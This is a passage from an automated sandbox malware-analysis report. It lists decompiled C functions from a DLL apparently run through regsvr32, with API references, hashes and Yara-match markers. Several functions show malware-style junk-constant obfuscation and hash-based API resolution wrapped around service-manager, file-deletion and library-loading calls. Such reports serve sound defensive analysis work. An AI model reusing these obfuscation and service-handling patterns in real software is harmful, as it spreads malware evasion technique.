                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: e6ac7781fc78b7d41e4b3f6506ced5b212b4d593b15d6e9cb0be83b532d52fd1
                                                                                                                • Instruction ID: e1ab424febfb42e6473ade3679e1394c09c05e909e094727f707cb237c5c0029
                                                                                                                • Opcode Fuzzy Hash: e6ac7781fc78b7d41e4b3f6506ced5b212b4d593b15d6e9cb0be83b532d52fd1
                                                                                                                • Instruction Fuzzy Hash: 38114971600A15EFD710EF54E8C4B99B7B8FF09359F50802AE5568B5A1CBB1FD80CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002D9C0(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                                				void* __edi;
                                                                                                                				struct _CRITICAL_SECTION* _t4;
                                                                                                                				void* _t7;
                                                                                                                				void* _t10;
                                                                                                                				signed int _t11;
                                                                                                                				void* _t14;
                                                                                                                				intOrPtr* _t15;
                                                                                                                				void* _t17;
                                                                                                                
                                                                                                                				_t17 = __ebp;
                                                                                                                				_t14 = __esi;
                                                                                                                				_t7 = __ebx;
                                                                                                                				_t11 = _a4;
                                                                                                                				_t20 = _t11 - 0x11;
                                                                                                                				if(_t11 >= 0x11) {
                                                                                                                					_t4 = E1001729E(__ebx, _t10, _t11, __esi, _t20);
                                                                                                                				}
                                                                                                                				if( *0x10070d00 == 0) {
                                                                                                                					_t4 = E1002D99C();
                                                                                                                				}
                                                                                                                				_push(_t7);
                                                                                                                				_push(_t17);
                                                                                                                				_push(_t14);
                                                                                                                				_t15 = 0x10070eb8 + _t11 * 4;
                                                                                                                				if( *_t15 == 0) {
                                                                                                                					EnterCriticalSection(0x10070ea0);
                                                                                                                					if( *_t15 == 0) {
                                                                                                                						_t4 = 0x10070d08 + _t11 * 0x18;
                                                                                                                						InitializeCriticalSection(_t4);
                                                                                                                						 *_t15 =  *_t15 + 1;
                                                                                                                					}
                                                                                                                					LeaveCriticalSection(0x10070ea0);
                                                                                                                				}
                                                                                                                				EnterCriticalSection(0x10070d08 + _t11 * 0x18);
                                                                                                                				return _t4;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D9FC
                                                                                                                • InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA0B
                                                                                                                • LeaveCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA18
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA24
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2895727460-0
                                                                                                                • Opcode ID: 53b785d5ee71a24d62151251ee7496b5fde74aea0dc84a825a38766a96a4fda3
                                                                                                                • Instruction ID: bdad85f7b5235e5c437b9f7bdcf5b334b90f7a9d130787cc52641b1b32bf6e1f
                                                                                                                • Opcode Fuzzy Hash: 53b785d5ee71a24d62151251ee7496b5fde74aea0dc84a825a38766a96a4fda3
                                                                                                                • Instruction Fuzzy Hash: A4F0F073600215DBE340EF58EC84B59BBAAEB86354F92461BF18493012CB39ACC0C665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002D154(long* __ecx, signed int _a4) {
                                                                                                                				void* _t9;
                                                                                                                				struct _CRITICAL_SECTION* _t12;
                                                                                                                				signed int _t14;
                                                                                                                				long* _t16;
                                                                                                                
                                                                                                                				_t16 = __ecx;
                                                                                                                				_t1 =  &(_t16[7]); // 0x10070ce8
                                                                                                                				_t12 = _t1;
                                                                                                                				EnterCriticalSection(_t12);
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_t14 <= 0) {
                                                                                                                					L5:
                                                                                                                					LeaveCriticalSection(_t12);
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t3 =  &(_t16[3]); // 0x3
                                                                                                                				if(_t14 >=  *_t3) {
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_t9 = TlsGetValue( *_t16);
                                                                                                                				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					LeaveCriticalSection(_t12);
                                                                                                                					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(10070CE8,?,?,00000000,1002D703,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D15D
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002D172
                                                                                                                • LeaveCriticalSection.KERNEL32(10070CE8,?,?,00000000,1002D703,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D188
                                                                                                                • LeaveCriticalSection.KERNEL32(10070CE8,?,?,00000000,1002D703,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D193
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969253408-0
                                                                                                                • Opcode ID: ece859cae3d465ca1061230bf02a92b2eea1f2dc198a874cb04840c10f12a575
                                                                                                                • Instruction ID: 8a0f3dcb096a9b06504c92c56ecc0be11d67302843099253181646179d08d629
                                                                                                                • Opcode Fuzzy Hash: ece859cae3d465ca1061230bf02a92b2eea1f2dc198a874cb04840c10f12a575
                                                                                                                • Instruction Fuzzy Hash: 1FF01276200611AFE314DF64ECA884AB3AAFF8836139AC866E45593512D730FC158B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1039
                                                                                                                Total number of Limit Nodes:15

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 431 236e01-236eb3 call 23c98a call 237f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00236E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E0023C98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E00237F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00236EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 5d15bad4580734018d1f3f08c0c09e4fe4e6c2849388406a142c327b69296f5f
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: 061185B2D01218BBDB04DFA5C8498DEBFB6EF41300F10C189FA18A7241D7B55B219F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 238e38-238ee4 call 23c98a call 237f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00238E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				int _t53;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0023C98A(_t37);
                                                                                                                				_v12 = 0x1c994a;
                                                                                                                				_v12 = _v12 << 3;
                                                                                                                				_v12 = _v12 + 0xffff2161;
                                                                                                                				_v12 = _v12 | 0xd2ae04c7;
                                                                                                                				_v12 = _v12 ^ 0xd2e10dca;
                                                                                                                				_v8 = 0x3225a3;
                                                                                                                				_v8 = _v8 + 0xb485;
                                                                                                                				_t48 = 0x24;
                                                                                                                				_v8 = _v8 / _t48;
                                                                                                                				_v8 = _v8 + 0x1169;
                                                                                                                				_v8 = _v8 ^ 0x000adbd5;
                                                                                                                				_v16 = 0x918fbd;
                                                                                                                				_v16 = _v16 * 0x4a;
                                                                                                                				_v16 = _v16 ^ 0x2a1cf10f;
                                                                                                                				E00237F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
                                                                                                                				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
                                                                                                                				return _t46;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00238EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: f6fab88ecfed5c6883a55fd550d32bd0b3bd33a8383fd0165bb7645a739871b3
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 581122B1E01208FBEF05DFA4DA4A8DEBFB6EB05314F10C089E914A6250E7B55B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 237bc6-237c79 call 23c98a call 237f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00237BC6(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t42;
                                                                                                                				int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E0023C98A(_t42);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0xa8f244;
                                                                                                                				_v16 = 0x845cf1;
                                                                                                                				_t54 = 0x49;
                                                                                                                				_v16 = _v16 / _t54;
                                                                                                                				_v16 = _v16 | 0x150b5070;
                                                                                                                				_v16 = _v16 ^ 0x15045549;
                                                                                                                				_v12 = 0xcbfb15;
                                                                                                                				_v12 = _v12 ^ 0x1a866322;
                                                                                                                				_v12 = _v12 + 0xffff3502;
                                                                                                                				_v12 = _v12 ^ 0x1a48e6f8;
                                                                                                                				_v8 = 0xe2385a;
                                                                                                                				_v8 = _v8 | 0xfdf9d9f4;
                                                                                                                				_t55 = 0x6e;
                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                				_v8 = _v8 + 0xffffa480;
                                                                                                                				_v8 = _v8 ^ 0x02430dde;
                                                                                                                				E00237F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
                                                                                                                				_t52 = DeleteFileW(_a4); // executed
                                                                                                                				return _t52;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 00237C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: f25e2573c6b48e95a906c36cea62911d0d7874800a3877e54f4a803cf226c0f9
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: 2D115BB1D00248BFDB18DFE5D94AA9EBBB1EB40304F208198E41477290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 24ed7b-24ee13 call 23c98a call 237f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0024ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0023C98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E00237F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0024EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: ae49f76f56203dfd171bd5e40fc950816d5551feac6f4d65044ea94fd64d32a9
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 470139B1D00208BBDB18DFA4C94A9DEBFB5EF45314F10C08AE914A6241E7B25B658F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00234A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0023C98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E00237F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 565290f482b33d4840b19e243af68192c7914bb6422126c8c557a597b03c6d30
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: DF1148B1C11208FFCB08DFA4DA46ADEBBB4FB00311F20C188E415B6251D3704B149F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00247B25() {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_v16 = 0x340970;
                                                                                                                				_t2 =  &_v16; // 0x340970
                                                                                                                				_t31 = 0x26;
                                                                                                                				_v16 =  *_t2 / _t31;
                                                                                                                				_v16 = _v16 ^ 0x000e30ec;
                                                                                                                				_v8 = 0x85299d;
                                                                                                                				_v8 = _v8 + 0xa54a;
                                                                                                                				_v8 = _v8 ^ 0x35a74c3e;
                                                                                                                				_v8 = _v8 ^ 0x3521895a;
                                                                                                                				_v12 = 0xcc7db5;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 ^ 0x000f948d;
                                                                                                                				E00237F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
                                                                                                                				ExitProcess(0);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00247B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: dd5e578786a35f68670e5b65eeed0d612ddb8fd065e8215f9a7b9387aa6f9947
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 51F08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B189F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0024A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E0023C98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E00237F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0024A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: ffbc411fb934d6efd9f18a591a8e61235854e61457ee7b171c0325687f6af4fe
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: D821C572901108FBDF05DFE5D94A9DEBFB6EF48314F108149F91866260D3728A609F91
                                                                                                                Uniqueness

